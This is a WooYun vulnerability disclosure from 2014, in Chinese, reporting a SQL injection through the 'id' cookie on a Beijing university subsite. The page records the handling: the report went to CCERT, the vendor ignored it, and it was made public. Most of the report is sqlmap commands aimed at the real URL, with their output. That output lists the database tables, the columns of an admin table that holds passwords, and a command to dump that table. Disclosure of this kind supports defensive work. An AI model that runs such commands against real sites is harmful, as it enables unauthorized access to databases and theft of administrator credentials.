当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-088160

漏洞标题:北京科技大学某分站sql注入漏洞

相关厂商:北京科技大学

漏洞作者: 路人甲

提交时间:2014-12-23 09:29

修复时间:2014-12-28 09:30

公开时间:2014-12-28 09:30

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:已交由第三方合作机构(CCERT教育网应急响应组)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-12-23: 细节已通知厂商并且等待厂商处理中
2014-12-28: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

北京科技大学某站存在sql注入 泄露数据库表信息

详细说明:

sqlmap -u "http://rsc.ustb.edu.cn/page.asp" --cookie "id=270" --level 2 --tables
......
Database: Microsoft_Access_masterdb
[2 tables]
+-------+
| admin |
| news |
+-------+
sqlmap -u "http://rsc.ustb.edu.cn/page.asp" --cookie "id=270" --level 2 -T news --columns

Database: Microsoft_Access_masterdb
Table: news
[5 columns]
+---------+-------------+
| Column | Type |
+---------+-------------+
| user | non-numeric |
| content | non-numeric |
| id | numeric |
| sid | numeric |
| title | non-numeric |
+---------+-------------+
sqlmap -u "http://rsc.ustb.edu.cn/page.asp" --cookie "id=270" --level 2 -T admin --columns
......
Database: Microsoft_Access_masterdb
Table: admin
[7 columns]
+----------+-------------+
| Column | Type |
+----------+-------------+
| user | non-numeric |
| admin | non-numeric |
| content | non-numeric |
| id | numeric |
| password | non-numeric |
| sid | numeric |
| title | non-numeric |
+----------+-------------+

漏洞证明:

sqlmap -u "http://rsc.ustb.edu.cn/page.asp" --cookie "id=270" --level 2 -T admin --dump

QQ截图20141222164834.png

修复方案:

cookie 参数过滤

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2014-12-28 09:30

厂商回复:

最新状态:

暂无